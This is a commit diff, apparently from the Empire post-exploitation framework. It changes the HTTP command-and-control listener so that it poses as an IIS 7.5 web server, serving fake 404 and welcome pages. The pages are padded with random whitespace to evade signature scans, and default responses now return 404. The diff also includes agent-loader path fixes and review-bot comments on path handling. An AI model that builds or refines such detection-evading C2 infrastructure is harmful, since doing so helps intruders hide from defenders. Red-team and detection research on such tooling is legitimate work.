Minor changes for the install_path. My bad
commit
192630dedd
Binary file not shown.
After Width: | Height: | Size: 181 KiB |
|
@ -7,7 +7,7 @@ import ssl
|
|||
import time
|
||||
import copy
|
||||
from pydispatch import dispatcher
|
||||
from flask import Flask, request, make_response
|
||||
from flask import Flask, request, make_response, send_from_directory
|
||||
# Empire imports
|
||||
from lib.common import helpers
|
||||
from lib.common import agents
|
||||
|
@ -152,17 +152,86 @@ class Listener:
|
|||
# set the default staging key to the controller db default
|
||||
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
|
||||
|
||||
# randomize the length of the default_response and index_page headers to evade signature based scans
|
||||
self.header_offset = random.randint(0, 64)
|
||||
|
||||
def default_response(self):
|
||||
"""
|
||||
Returns an IIS 7.5 404 not found page.
|
||||
"""
|
||||
|
||||
return '\n'.join([
|
||||
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
|
||||
'<html xmlns="http://www.w3.org/1999/xhtml">',
|
||||
'<head>',
|
||||
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
|
||||
'<title>404 - File or directory not found.</title>',
|
||||
'<style type="text/css">',
|
||||
'<!--',
|
||||
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
|
||||
'fieldset{padding:0 15px 10px 15px;}',
|
||||
'h1{font-size:2.4em;margin:0;color:#FFF;}',
|
||||
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
|
||||
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
|
||||
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
|
||||
'background-color:#555555;}',
|
||||
'#content{margin:0 0 0 2%;position:relative;}',
|
||||
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
|
||||
'-->',
|
||||
'</style>',
|
||||
'</head>',
|
||||
'<body>',
|
||||
'<div id="header"><h1>Server Error</h1></div>',
|
||||
'<div id="content">',
|
||||
' <div class="content-container"><fieldset>',
|
||||
' <h2>404 - File or directory not found.</h2>',
|
||||
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
|
||||
' </fieldset></div>',
|
||||
'</div>',
|
||||
'</body>',
|
||||
'</html>',
|
||||
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
|
||||
])
|
||||
|
||||
def index_page(self):
|
||||
"""
|
||||
Returns a default HTTP server page.
|
||||
"""
|
||||
page = "<html><body><h1>It works!</h1>"
|
||||
page += "<p>This is the default web page for this server.</p>"
|
||||
page += "<p>The web server software is running but no content has been added, yet.</p>"
|
||||
page += "</body></html>"
|
||||
return page
|
||||
|
||||
return '\n'.join([
|
||||
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
|
||||
'<html xmlns="http://www.w3.org/1999/xhtml">',
|
||||
'<head>',
|
||||
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
|
||||
'<title>IIS7</title>',
|
||||
'<style type="text/css">',
|
||||
'<!--',
|
||||
'body {',
|
||||
' color:#000000;',
|
||||
' background-color:#B3B3B3;',
|
||||
' margin:0;',
|
||||
'}',
|
||||
'',
|
||||
'#container {',
|
||||
' margin-left:auto;',
|
||||
' margin-right:auto;',
|
||||
' text-align:center;',
|
||||
' }',
|
||||
'',
|
||||
'a img {',
|
||||
' border:none;',
|
||||
'}',
|
||||
'',
|
||||
'-->',
|
||||
'</style>',
|
||||
'</head>',
|
||||
'<body>',
|
||||
'<div id="container">',
|
||||
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
|
||||
'</div>',
|
||||
'</body>',
|
||||
'</html>',
|
||||
])
|
||||
|
||||
def validate_options(self):
|
||||
"""
|
||||
|
@ -572,7 +641,7 @@ class Listener:
|
|||
|
||||
if language == 'powershell':
|
||||
|
||||
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
|
||||
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
|
||||
code = f.read()
|
||||
f.close()
|
||||
|
||||
|
@ -598,7 +667,7 @@ class Listener:
|
|||
return code
|
||||
|
||||
elif language == 'python':
|
||||
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
|
||||
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
|
||||
code = f.read()
|
||||
f.close()
|
||||
|
||||
|
@ -827,7 +896,7 @@ def send_message(packets=None):
|
|||
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
|
||||
return launcher
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
@app.before_request
|
||||
def check_ip():
|
||||
|
@ -836,7 +905,7 @@ def send_message(packets=None):
|
|||
"""
|
||||
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
|
||||
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
|
||||
@app.after_request
|
||||
|
@ -854,6 +923,25 @@ def send_message(packets=None):
|
|||
response.headers['Expires'] = "0"
|
||||
return response
|
||||
|
||||
@app.route('/')
|
||||
@app.route('/index.html')
|
||||
def serve_index():
|
||||
"""
|
||||
Return default server web page if user navigates to index.
|
||||
"""
|
||||
|
||||
static_dir = self.mainMenu.installPath + "data/misc/"
|
||||
return make_response(self.index_page(), 200)
|
||||
|
||||
@app.route('/welcome.png')
|
||||
def serve_index_helper():
|
||||
"""
|
||||
Serves image loaded by index page.
|
||||
"""
|
||||
|
||||
static_dir = self.mainMenu.installPath + "data/misc/"
|
||||
return send_from_directory(static_dir, 'welcome.png')
|
||||
|
||||
|
||||
@app.route('/<path:request_uri>', methods=['GET'])
|
||||
def handle_get(request_uri):
|
||||
|
@ -906,7 +994,7 @@ def send_message(packets=None):
|
|||
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
|
||||
return make_response(self.default_response(), 401)
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
else:
|
||||
# actual taskings
|
||||
|
@ -914,14 +1002,13 @@ def send_message(packets=None):
|
|||
return make_response(results, 200)
|
||||
else:
|
||||
# dispatcher.send("[!] Results are None...", sender='listeners/http')
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
else:
|
||||
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
|
||||
return make_response(self.default_response(), 200)
|
||||
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
@app.route('/<path:request_uri>', methods=['POST'])
|
||||
def handle_post(request_uri):
|
||||
|
@ -966,16 +1053,16 @@ def send_message(packets=None):
|
|||
|
||||
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
|
||||
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
elif results == 'VALID':
|
||||
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
else:
|
||||
return make_response(results, 200)
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
try:
|
||||
certPath = listenerOptions['CertPath']['Value']
|
||||
|
@ -1003,7 +1090,6 @@ def send_message(packets=None):
|
|||
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
|
||||
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
|
||||
|
||||
|
||||
def start(self, name=''):
|
||||
"""
|
||||
Start a threaded instance of self.start_server() and store it in the
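Review bot: The two agent loads now read `open(self.mainMenu.installPath + "./data/agent/agent.ps1")` and the matching `"./data/agent/agent.py"` line, while the new static routes build `self.mainMenu.installPath + "data/misc/"`, so one file mixes two conventions and both appear to work only if the install path ends in a separator. Building the path with `os.path.join(self.mainMenu.installPath, "data", "agent", "agent.ps1")` (assuming `os` is imported above the visible import hunk) removes that dependency, and `with open(path) as f: code = f.read()` closes the handle even if the read raises. In `serve_index`, `static_dir` is assigned but never used, because the handler returns `self.index_page()`; that line can be dropped. The enclosing functions start and end outside these hunks.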
|
||||
|
|
|
@ -31,7 +31,7 @@ elif STAGING_KEY == "RANDOM":
|
|||
|
||||
# Calculate the install path. We know the project directory will always be the parent of the current directory. Any modifications of the folder structure will
|
||||
# need to be applied here.
|
||||
INSTALL_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
|
||||
INSTALL_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) + "/"
|
||||
|
||||
# an IP white list to ONLY accept clients from
|
||||
# format is "192.168.1.1,192.168.1.10-192.168.1.100,10.0.0.0/8"
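Review bot: The comment above `INSTALL_PATH` does not mention that the value now ends in "/", although any caller that concatenates a relative path onto it depends on that. I would extend the comment with `# INSTALL_PATH always ends with a path separator; callers append relative paths directly.`, or keep the value bare and join at the call sites with `os.path.join`.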
|
||||
|
|